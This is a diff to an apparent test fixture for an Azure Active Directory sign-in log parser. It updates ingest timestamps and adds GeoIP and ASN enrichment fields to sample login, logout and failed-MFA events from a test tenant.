@@ -3907,7 +4303,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970241200Z", + "ingested": "2021-12-14T14:49:08.047433945Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3947,6 +4343,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4015,7 +4423,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970247Z", + "ingested": "2021-12-14T14:49:08.047434498Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4052,6 +4460,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4133,7 +4553,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970252800Z", + "ingested": "2021-12-14T14:49:08.047435288Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4173,6 +4593,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4241,7 +4673,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970258400Z", + "ingested": "2021-12-14T14:49:08.047435794Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4278,6 +4710,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4359,7 +4803,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970264Z", + "ingested": "2021-12-14T14:49:08.047436312Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4399,6 +4843,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4479,7 +4935,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970269500Z", + "ingested": "2021-12-14T14:49:08.047437030Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4519,6 +4975,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4599,7 +5067,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970275200Z", + "ingested": "2021-12-14T14:49:08.047437694Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4639,6 +5107,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -4707,7 +5187,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970279Z", + "ingested": "2021-12-14T14:49:08.047438434Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4744,6 +5224,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -4825,7 +5317,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970283500Z", + "ingested": "2021-12-14T14:49:08.047439118Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4865,6 +5357,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ 
@@ -4945,7 +5449,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970288400Z", + "ingested": "2021-12-14T14:49:08.047439724Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -4985,6 +5489,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -5065,7 +5581,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970293300Z", + "ingested": "2021-12-14T14:49:08.047440305Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5105,6 +5621,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5185,7 +5713,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970297Z", + "ingested": "2021-12-14T14:49:08.047440992Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5225,6 +5753,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5293,7 +5833,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970301400Z", + "ingested": "2021-12-14T14:49:08.047441667Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 